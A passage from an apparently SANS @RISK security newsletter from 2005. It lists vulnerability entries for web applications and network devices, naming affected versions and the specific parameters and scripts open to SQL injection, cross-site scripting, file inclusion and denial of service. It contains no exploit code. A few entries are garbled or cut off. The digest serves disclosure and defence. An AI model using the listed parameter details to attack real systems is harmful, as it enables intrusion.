  • Ref: http://pridels.blogspot.com/2005/11/ovbb-sql-vulnerabilities.html
  • 05.48.67 - CVE: Not Available
  • Platform: Web Application
  • Title: OrbitScripts SmartPPC Pro Username Parameter Cross-Site Scripting
  • Description: SmartPPC Pro is a PPC search engine implemented in PHP. SmartPPC Pro is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "username" parameter of the "directory.php", "frames.php", and "search.php" scripts.
  • Ref: http://www.securityfocus.com/bid/15567
  • 05.48.68 - CVE: Not Available
  • Platform: Web Application
  • Title: vtiger CRM Multiple Input Validation Vulnerabilities
  • Description: vtiger is a customer relationship management system. It is prone to multiple input validation vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. vtiger CRM version 4.2 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15569
  • 05.48.69 - CVE: Not Available
  • Platform: Web Application
  • Title: eFiction Multiple Input Validation Vulnerabilities
  • Description: eFiction is a fan appreciation website application. Insufficient sanitization of the user supplied input exposes the application to multiple input validation issues. eFiction versions 1.0, 1.1 and 2.0 are affected.
  • Ref: http://www.securityfocus.com/bid/15568
  • 05.48.70 - CVE: Not Available
  • Platform: Web Application
  • Title: IsolSoft Support Center Multiple SQL Injection
  • Description: Support Center is an automated help desk system. It is prone to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input. A remote attacker could exploit this issue to compromise the application. Support Center versions 2.2 and earlier are affected.
  • Ref: http://pridels.blogspot.com/2005/11/isolsoft-support-center-sql-inj.html
  • 05.48.71 - CVE: CVE-2005-3827
  • Platform: Web Application
  • Title: AgileBill Product_Cat SQL Injection
  • Description: AgileBill is an account management application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id" parameter of the "product_cat" page. AgileBill versions 1.4.92 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/agilebill-14x-id-sql-injection.html
  • 05.48.72 - CVE: Not Available
  • Platform: Web Application
  • Title: PBLang Bulletin Board System Multiple HTML Injection Vulnerabilities
  • Description: PBLang is a bulletin board system. PBLang is prone to multiple HTML injection vulnerabilities due to improper sanitization of user-supplied input before using it in dynamically generated content. Multiple fields in the "profile.php" and "ucp.php" scripts are improperly sanitized. PBLang version 4.65 is vulnerable.
  • Ref: http://www.securityfocus.com/bid/15573/exploit
  • 05.48.73 - CVE: CVE-2005-3860
  • Platform: Web Application
  • Title: Athena PHP Website Administration Remote File Include
  • Description: Athena PHP Website Administration is a PHP Web application that utilizes a MySQL database to store site content. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "athena_dir" parameter of the "athena.php" script. Athena PHP Website Administration version 0.1a is vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417796
  • 05.48.74 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPGreetz Remote File Include
  • Description: phpGreetz is a freely available, open source greeting card package. It is prone to a remote file include vulnerability due to insufficient sanitization of user-supplied input to the "content" parameter of the "content.php" script. phpGreetz version 0.99 is affected.
  • Ref: http://www.securityfocus.com/archive/1/417798
  • 05.48.75 - CVE: Not Available
  • Platform: Web Application
  • Title: Q-News Remote File Include Vulnerability
  • Description: Q-News is a Quick News generator. Insufficient sanitization of the "id" parameter in the "q-news.php" script exposes the application to a remote file include issue. Q-News version 2.0 is affetced.
  • Ref: http://www.securityfocus.com/bid/15576
  • 05.48.76 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPWordPress Multiple SQL Injection
  • Description: PHPWordPress is a news article management application. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "poll", "category" and "ctg" parameters of the "index.php" script. PHPWordPress versions 3.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/phpwordpress-30-sql-inj.html
  • 05.48.77 - CVE: Not Available
  • Platform: Web Application
  • Title: Nicecoder iDesk FAQ.PHP SQL Injection
  • Description: Nicecoder iDesk is a web based customer support application. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "cat_id" parameter of the "faq.php" script before using it in an SQL query. Nicecoder iDesk version 1.0 is reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/idesk-catid-sql-inj.html
  • 05.48.78 - CVE: CVE-2005-3884
  • Platform: Web Application
  • Title: Zainu SQL Injection Vulnerabilities
  • Description: Zainu is a web-based music video site creation application. Zainu is prone to SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to various scripts. Zainu version 2.0 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html
  • 05.48.79 - CVE: Not Available
  • Platform: Web Application
  • Title: Babe Logger SQL Injection Vulnerabilities
  • Description: Babe Logger is a content management application. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "gal" parameter of the "index.php" script and the "id" parameter of the "comments.php" script.
  • Ref: http://www.securityfocus.com/bid/15580
  • 05.48.80 - CVE: Not Available
  • Platform: Web Application
  • Title: PDJK-support Suite Multiple SQL Injection Vulnerabilities
  • Description: PDJK-support Suite is a help desk and software support application. Insuficient sanitization of user-supplied input exposes the application to multiple SQL injection issues. PDJK-support retail version 1.1a is affected.
  • Ref: http://www.securityfocus.com/bid/15598
  • 05.48.81 - CVE: Not Available
  • Platform: Web Application
  • Title: Top Music Module SQL Injection
  • Description: Top Music Module is third-party module for PHP-Nuke. It is prone to an SQL injection vulnerability due to a failure in the application to properly sanitize user-supplied input to the "idartist", "idsong" and "idalbum" parameters. A remote attacker could exploit this issue to compromise the application.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html
  • 05.48.82 - CVE: Not Available
  • Platform: Web Application
  • Title: Bedeng PSP SQL Injection Vulnerabilities
  • Description: Bedeng PSP is a Web portal application. It is prone to SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "ckode" parameter in "baca.php", "a.ngroup" parameter in "download.php", and "a.nsub" parameter in "index.php". Bedeng PSP version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15583
  • 05.48.83 - CVE: Not Available
  • Platform: Web Application
  • Title: Nephp Publisher SQL Injection
  • Description: Nelogic Nephp Publisher is a Web publishing application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "id" and "nnet_catid" parameters of the "index.php" script. Nelogic Nephp Publisher version 4.5.2 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html
  • 05.48.84 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz Resource Repository Script Multiple SQL Injection Vulnerabilities
  • Description: Softbiz Resource Repository Script is a web-based resource directory and advertising platform. It is prone to SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "sbres_id" parameter of the "details_res.php", "refer_friend.php", "report_link.php" scripts and the "sbcat_id" in the "showcats.php" script before using it in an SQL query. Softbiz Resource Repository Script version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15585/exploit
  • 05.48.85 - CVE: Not Available
  • Platform: Web Application
  • Title: BerliOS SourceWell SQL Injection
  • Description: BerliOS SourceWell is a web-based software repository application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "cnt" parameter of the "index.php" script. BerliOS SourceWell version 1.1.3 is affected.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html
  • 05.48.86 - CVE: Not Available
  • Platform: Web Application
  • Title: AllWeb Search SQL Injection
  • Description: AllWeb Search is a web-based search application. Insufficient sanitization of the "search" parameter of the "index.php" script exposes the application to an SQL injection issue. AllWeb Search version 3.0 is affetced.
  • Ref: http://www.securityfocus.com/bid/15587
  • 05.48.87 - CVE: Not Available
  • Platform: Web Application
  • Title: K-Search SQL Injection
  • Description: K-Search is a meta-search application. It is vulnerable to an SQL injection issue due to a failure in the application to properly sanitize user-supplied input. A remote attacker could exploit this issue to compromise the application. K-Search version 1.0 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005_11_27_pridels_archive.html
  • 05.48.88 - CVE: CVE-2005-3871
  • Platform: Web Application
  • Title: JBB Multiple SQL Injection Vulnerabilities
  • Description: JBB is a web-based bulletin board application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "nr" parameter in "topiczeigen.php", the "forum" and "zeigeseite" parameters in "showforum.php", the "forum" parameter in "newtopic.php", and the "tidnr" parameter in the "neuerbeitrag.php" script. JBB version 0.9.9 rc3 is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/jbb-sql-inj-vuln.html
  • 05.48.89 - CVE: Not Available
  • Platform: Web Application
  • Title: UGroup SQL Injection Vulnerabilities
  • Description: UGroup is a Web-based discussion forum application. It is prone to SQL injection vulnerabilities due to a failure in the application to properly sanitize user-supplied input to the "FORUM_ID" parameter in "forum.php", and "CAT_ID", "FORUM_ID", "TOPIC_ID" parameters in "topic.php" before using it in an SQL query. UGroup version 2.6.2 is affected.
  • Ref: http://www.securityfocus.com/bid/15591/exploit
  • 05.48.90 - CVE: Not Available
  • Platform: Web Application
  • Title: ShockBoard Offset Parameter SQL Injection
  • Description: ShockBoard is a web-based bulletin board application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "offset" parameter of the "topic.php" script. ShockBoard versions 4.0 and 3.0 are affected.
  • Ref: http://www.securityfocus.com/bid/15592
  • 05.48.91 - CVE: Not Available
  • Platform: Web Application
  • Title: SimpleBBS Search Module Parameters SQL Injection
  • Description: SimpleBBS is a web-based bulletin board system application. Insufficient sanitization of user-supplied input exposes the application to an SQL injection issue. SimpleBBS version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15594
  • 05.48.92 - CVE: Not Available
  • Platform: Web Application
  • Title: Helpdesk Issue Manager Multiple SQL Injection Vulnerabilities
  • Description: Helpdesk Issue Manager is a web-based help desk application. It is vulnerable to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. An attacker could exploit this issue to compromise the application. Helpdesk Issue Manager versions 0.9 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/helpdesk-issue-manager-v09-sql-inj.html
  • 05.48.93 - CVE: CVE-2005-3876
  • Platform: Web Application
  • Title: ADC2000 NG Pro SQL Injection
  • Description: ADC2000 NG Pro is a Web-based banner exchange application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "lang" and "cat" parameters of the "adcbrowres.php" script. ADC2000 NG Pro version 1.2 and NG Pro lite are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/adc2000-ng-pro-sql-inj-vuln.html
  • 05.48.94 - CVE: Not Available
  • Platform: Web Application
  • Title: Simple Document Management System Multiple SQL Injection Vulnerabilities
  • Description: Simple Document Management System (SDMS) is a web-based content management system. SDMS is prone to SQL injection vulnerabilities. These issues are due to improper sanitization of user-supplied input to the "folder_id" parameter in "list.php" and "mid" parameter in "messages.php" before using them in an SQL query. SDMS version 2.0-CVS is reported to be affected.
  • Ref: http://www.securityfocus.com/bid/15596/exploit
  • 05.48.95 - CVE: CVE-2005-3851
  • Platform: Web Application
  • Title: OASYS Lite Search.ASP Cross-Site Scripting
  • Description: OASYS Lite is an online attendance system implemented in ASP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "keyword" parameter of the "search.asp" script. OASYS Lite versions 1.0 and earlier are affected.
  • Ref: http://pridels.blogspot.com/2005/11/oasys-lite-10-searchasp-xss-vuln.html
  • 05.48.96 - CVE: Not Available
  • Platform: Web Application
  • Title: OKBSYS Lite Search.ASP Cross-Site Scripting
  • Description: OKBSYS Lite is an online knowledge base system implemented in ASP. It is prone to a cross-site scripting vulnerability due to insufficient sanitization of user-supplied input to the "q" parameter of the "search.asp" script. OKBSYS Lite versions 1.0 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15607
  • 05.48.97 - CVE: Not Available
  • Platform: Web Application
  • Title: WebCalendar Multiple SQL Injection Vulnerabilities
  • Description: WebCalendar is a web-based calendar application. Insufficient sanitization of user supplied input exposes the application to multiple SQL injection issues. WebCalendar version 1.0.1 is affected.
  • Ref: http://www.securityfocus.com/bid/15606
  • 05.48.98 - CVE: Not Available
  • Platform: Web Application
  • Title: Randshop Multiple SQL Injection Vulnerabilities
  • Description: Randshop is a shopping cart application. It is vulnerable to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input. An attacker could exploit these issues to compromise the application. All current versions of Randshop are affected.
  • Ref: http://www.securityfocus.com/archive/1/417896
  • 05.48.99 - CVE: Not Available
  • Platform: Web Application
  • Title: WebCalendar Export_Handler.PHP File Corruption
  • Description: WebCalendar is a calendar application. It is vulnerable to a file corruption issue due to insufficient sanitization of the "id" and "format" parameters of the "export_handler.php" script. WebCalendar version 1.0.1 is vulnerable.
  • Ref: http://www.ush.it/2005/11/28/webcalendar-multiple-vulnerabilities
  • 05.48.100 - CVE: Not Available
  • Platform: Web Application
  • Title: GuppY Multiple Local File Include and Information Disclosure Vulnerabilities
  • Description: GuppY is web portal software. It is affected by multiple local file include and information disclosure vulnerabilities. These issues are due to improper sanitization of user-supplied input. The problems present themselves specifically when an attacker passes the location of a potentially malicious local script through the "lng" parameter of the "archbatch.php", "nwlmail.php" and "dbbatch.php" scripts. GuppY versions 4.5.9 and prior are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/417899
  • 05.48.101 - CVE: CVE-2005-3878
  • Platform: Web Application
  • Title: PHP Doc System Local File Include
  • Description: PHP Doc System is a web-based documentation application written in PHP. It is prone to a file include vulnerability which may allow for arbitrary code execution and information disclosure. PHP Doc System versions 1.5.1 and prior are reported to be vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/php-doc-system-151-local-file.html
  • 05.48.102 - CVE: Not Available
  • Platform: Web Application
  • Title: SearchSolutions Multiple Products Cross-Site Scripting Vulnerabilities
  • Description: SearchSolutions SearchFeed, RevenuePilot and Google API are search-related applications. Insufficient sanitization of user-supplied input exposes the application to multiple cross-site scripting issues. Please check the advisory below for a list of affected versions.
  • Ref: http://www.securityfocus.com/bid/15612
  • 05.48.103 - CVE: Not Available
  • Platform: Web Application
  • Title: Gallery Unspecified Security Vulnerability
  • Description: Gallery is a photo gallery application. It is prone to an unspecified security vulnerability. The vendor has not provided any further information about the issue, however, it is believed that the issue is remotely exploitable due to the nature of the application. The vendor has released version 2.0.2 to address the issue.
  • Ref: http://gallery.menalto.com/
  • 05.48.104 - CVE: Not Available
  • Platform: Web Application
  • Title: ASP-Rider Default.ASP SQL Injection
  • Description: ASP-Rider is a web log application. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the HTTP request header of the "default.asp" script before using it in an SQL query. ASP-Rider version 1.6 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/15617/exploit
  • 05.48.105 - CVE: CVE-2005-3846
  • Platform: Web Application
  • Title: Fantastic Scripts Fantastic News News.PHP SQL Injection
  • Description: Fantastic News is a web-based bulletin board written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "category" parameter of the "news.php" script. Fantastic News versions 2.1.1 and earlier are affected.
  • Ref: http://pridels.blogspot.com/2005/11/fantastic-news-category-sql-inj.html
  • 05.48.106 - CVE: Not Available
  • Platform: Web Application
  • Title: Xaraya Directory Traversal
  • Description: Xaraya is a web application framework implemented in PHP. It is prone to a directory traversal vulnerability due to an access validation error. Reports indicate that an attacker can supply directory traversal sequences followed by a file name and a null character through the "module" parameter of the "index.php" script to place files in arbitrary locations. Xaraya versions 1.0.0 RC4 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15623
  • 05.48.107 - CVE: Not Available
  • Platform: Web Application
  • Title: DMANews Multiple SQL Injection Vulnerabilities
  • Description: DMANews is a news readers application. Insufficient sanitization of the "id", "sortorder", and "display_num" parameters in the "index.php" script exposes the application to multiple SQL injection issues. DMANews versions 0.904 and 0.910 are affetced.
  • Ref: http://www.securityfocus.com/bid/15628
  • 05.48.108 - CVE: Not Available
  • Platform: Web Application
  • Title: PHP Upload Center Directory Traversal
  • Description: PHP Upload Center is a web-based application. It is vulnerable to a directory traversal issue due to a failure in the application to properly sanitize user-supplied input. A remote attacker may exploit this vulnerability to reveal files that contain potentially sensitive information. All current versions of PHP Upload Center are vulnerable.
  • Ref: http://liz0.3yr.net/phpuploadcenter.txt
  • 05.48.109 - CVE: Not Available
  • Platform: Web Application
  • Title: DRZES HMS Register_domain.PHP Cross-Site Scripting
  • Description: DRZES HMS is a Web hosting and account management application. It is prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. DRZES HMS versions 3.2 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/drzes-hms-32-multiple-vuln.html
  • 05.48.110 - CVE: Not Available
  • Platform: Web Application
  • Title: DRZES HMS Multiple SQL Injection Vulnerabilities
  • Description: DRZES HMS is a web content and customer management application. It is vunerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to such parameters as "plan_id" and "domain". DRZES HMS Versions 3.2 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/drzes-hms-32-multiple-vuln.html
  • 05.48.111 - CVE: Not Available
  • Platform: Web Application
  • Title: N-13 News SQL Injection
  • Description: N-13 News is a news management system. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "id" parameter of the "index.php" script before using it in an SQL query. N-13 News version 1.2 is affected.
  • Ref: http://www.securityfocus.com/bid/15643/exploit
  • 05.48.112 - CVE: Not Available
  • Platform: Web Application
  • Title: Entergal MX Multiple SQL Injection Vulnerabilities
  • Description: Entergal MX is a professional directory and search engine application that is written in PHP. It is prone to multiple SQL injection vulnerabilities. Entergal MX versions 2.0 and prior are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/entergal-mx-v20-sql-vuln.html
  • 05.48.113 - CVE: Not Available
  • Platform: Web Application
  • Title: BosDates Multiple SQL Injection Vulnerabilities
  • Description: BosDates is a calendar application that is written in PHP. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "year" and "category" parameters of the "calendar.php" script. BosDates versions 4.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/bosdates-v40-sql-vuln.html
  • 05.48.114 - CVE: Not Available
  • Platform: Web Application
  • Title: Post Affiliate Pro Index.PHP SQL Injection
  • Description: Post Affiliate Pro is an affiliate management application. Insufficient sanitization of the "sortorder" parameter in the "index.php" script exposes the application to an SQL injection issue. Post Affiliate Pro versions 2.0.4 and earlier are affetced.
  • Ref: http://www.securityfocus.com/bid/15633
  • 05.48.115 - CVE: Not Available
  • Platform: Web Application
  • Title: GhostScripter Amazon Shop Search.PHP SQL Injection
  • Description: GhostScripter Amazon Shop is a shopping cart application. It is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the "query" parameter of the "search.php" script before using it in an SQL query. Amazon Shop versions 5.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/amazon-shop-500-xss-vuln.html
  • 05.48.116 - CVE: Not Available
  • Platform: Web Application
  • Title: ltwCalendar Calendar.PHP SQL Injection
  • Description: ltwCalendar is a news readers application. ltwCalendar is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "id" parameter of the "calendar.php" script before using it in an SQL query. ltwCalendar versions 4.1.3 and prior are reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/codewalkers-ltwcalendar-4x-sql-inj.html
  • 05.48.117 - CVE: CVE-2005-3815
  • Platform: Web Application
  • Title: Orca Knowledgebase Knowledgebase.PHP SQL Injection
  • Description: Orca Knowledgebase is a knowledgebase management application that is written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "qid" parameter of the "knowledgebase.php" script. Orca Knowledgebase version 2.1b is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/orca-knowledgebase-sql-vuln.html
  • 05.48.118 - CVE: Not Available
  • Platform: Web Application
  • Title: Orca Blog Blog.PHP SQL Injection
  • Description: Orca Blog is a free and simple blogging application that is written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "msg" parameters of the "blog.php" script. Orca Blog version 1.3b is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/orca-blog-sql-inj-vuln.html
  • 05.48.119 - CVE: Not Available
  • Platform: Web Application
  • Title: Orca Ringmaker Ringmaker.PHP SQL Injection
  • Description: Orca Ringmaker is a webring application. Insufficient sanitization of the "start" parameter of the "ringmaker.php" script exposes the application to an SQL injection issue. Orca Ringmaker version 2.3c is affected.
  • Ref: http://www.securityfocus.com/bid/15633
  • 05.48.120 - CVE: Not Available
  • Platform: Web Application
  • Title: FAQ System Multiple SQL Injection
  • Description: FAQ System is a news readers application. It is prone to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input. An attacker could exploit this issue to compromise the application. Versions 1.1 and prior are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/faq-system-11-sql-inj-vuln.html
  • 05.48.121 - CVE: Not Available
  • Platform: Web Application
  • Title: Survey System Survey.PHP SQL Injection
  • Description: Survey System is a web-based survey application. Insufficient sanitization of the "SURVEY_ID" parameter in the "survey.php" script exposes the application to an SQL injection issue. Survey System versions 1.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15641
  • 05.48.122 - CVE: Not Available
  • Platform: Web Application
  • Title: phpAlbum Local File Include
  • Description: phpAlbum is a web-based photo album. Insufficient sanitization of the "cmd" and "var1" parameters in the "main.php" script exposes the application to a local file include issue. phpAlbum versions 0.2.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15651
  • 05.48.123 - CVE: Not Available
  • Platform: Web Application
  • Title: SocketKB Index.PHP SQL Injection
  • Description: SocketKB is a knowledgebase application. Insufficient sanitization of the "node" and "art_id" parameters in the "index.php" script exposes the application to multiple SQL injection issues. SocketKB version 1.1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15650
  • 05.48.124 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz B2B Multiple SQL Injection Vulnerabilities
  • Description: Softbiz B2B Trading Marketplace is a trading site builder application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "cid" parameter of the "selloffers.php", "buyoffers.php", "products.php" and "profiles.php" scripts. Softbiz B2B Trading Marketplace versions 1.1 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/softbiz-b2b-trading-marketplace-script.html
  • 05.48.125 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz FAQ Multiple SQL Injection Vulnerabilities
  • Description: Softbiz FAQ is a global trading site builder application. It is prone to multiple SQL injection vulnerabilities. These issues are due to insufficient sanitization of user-supplied input to the "id" parameter of the "faq_qanda.php", "refer_friend.php", "print_article.php" and "add_comment.php" scripts and the "cid" parameter of the "index.php" script. Softbiz FAQ versions 1.1 and prior are reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/softbiz-faq-script-multiple-sql-vuln.html
  • 05.48.126 - CVE: Not Available
  • Platform: Web Application
  • Title: Atlantis Knowledge Base Search.PHP SQL Injection
  • Description: Atlantis Knowledge Base is a knowledgebase management application written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "searchStr" parameter of the "search.php" script. Atlantis Knowledge Base versions 3.0 and earlier are reported to be vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/altantisfaq-sql-inj-vuln.html
  • 05.48.127 - CVE: Not Available
  • Platform: Web Application
  • Title: FaqRing Answer.PHP SQL Injection
  • Description: FaqRing is a knowledgebase application written in PHP. It is prone to an SQL injection vulnerability. This issue is due to insufficient sanitization of user-supplied input to the "id" parameter of the "answer.php" script. FaqRing versions 3.0 and prior are reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/faqring-30-sql-inj-vuln.html
  • 05.48.128 - CVE: Not Available
  • Platform: Web Application
  • Title: WSN Knowledge Base Multiple SQL Injection
  • Description: WSN Knowledge Base is a knowledgebase application. It is vulnerable to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input to the "index.php" script. An attacker could exploit this issue to compromise the application. WSN Knowledge Base Versions 1.2.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/wsn-knowledge-base-sql-inj-vuln.html
  • 05.48.129 - CVE: Not Available
  • Platform: Web Application
  • Title: O-Kiraku Nikki Nikki.PHP SQL Injection
  • Description: O-Kiraku Nikki is a calendar application. Insufficient sanitization of the "day_id" parameter in the "nikki.php" script exposes the application to an SQL injection issue. O-Kiraku Nikki versions 1.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15615
  • 05.48.130 - CVE: Not Available
  • Platform: Web Application
  • Title: 88Scripts Event Calendar SQL Injection
  • Description: 88Scripts Event Calendar is a calendar application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "m" parameter of the "index.php" script. 88Scripts Event Calendar versions 2.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/88scripts-event-calendar-v20-sql-inj.html
  • 05.48.131 - CVE: CVE-2005-3774038971.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038983.html
  • Platform: Network Device
  • Title: PIX Invalid TCP Checksum DOS
  • Description: Cisco PIX is a firewall. It is vulnerable to a denial of service issue when handling spoofed TCP SYN packets with invalid checksums. Cisco PIX versions 7.0 and earlier are vulnerable.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/
  • 05.48.132 - CVE: CVE-2005-3670
  • Platform: Network Device
  • Title: Multiple Clavister Products IKE Exchange Denial Of Service Vulnerabilities
  • Description: Clavister Firewall, and Clavister Security Gateway are commercial network security products. Clavister Firewall and Security Gateway products are prone to denial of service vulnerabilities. These issues are due to security flaws in Clavister's IPSec implementation. These vulnerabilities may be triggered by malformed IKE traffic.
  • Ref: http://lists.clavister.com/archives/cfw-users/msg01852.html
  • 05.48.133 - CVE: Not Available12.0(2a).
  • Platform: Network Device
  • Title: Cisco IOS HTTP Service HTML Injection
  • Description: Cisco IOS includes an HTTP service that provides router management services. This service was introduced in IOS releases 11.0 and subsequent. Cisco IOS HTTP service is reportedly prone to an HTML injection vulnerability. This issue may potentially allow for the theft of authentication credentials. An attacker could also exploit this issue to control how a site is rendered to the user or administrator. This vulnerability has been reported to affect IOS
  • Ref: http://www.securityfocus.com/bid/15602
  • 05.48.134 - CVE: CVE-2005-3768
  • Platform: Hardware
  • Title: Symantec Dynamic VPN Services IKE Traffic Denial Of Service
  • Description: Various Symantec products are prone to denial of service attacks. These issues are due to a failure of the product's IPSec implementation to properly handle malformed IKE packets. Successful attacks will cause the ISAKMP service to crash, denying service to dynamic VPN tunnels.
  • Ref: http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html

(c) 2005. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

Intense training! An excellent combination of technical and theory instruction.
-Richard Brull

GIAC GSEC Certification

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"It was a great learning experience that helped open my eyes wider. The instructor's knowledge was fantastic."
- Manuja Wikesekera, Melbourne Cricket Club

"This has been a great way to get working knowledge that would have taken years of experience to learn."
- Josh Carlson, Nelnet

"SANS always provides you what you need to become a better security professional at the right price."
- Rasik Vekaria, BP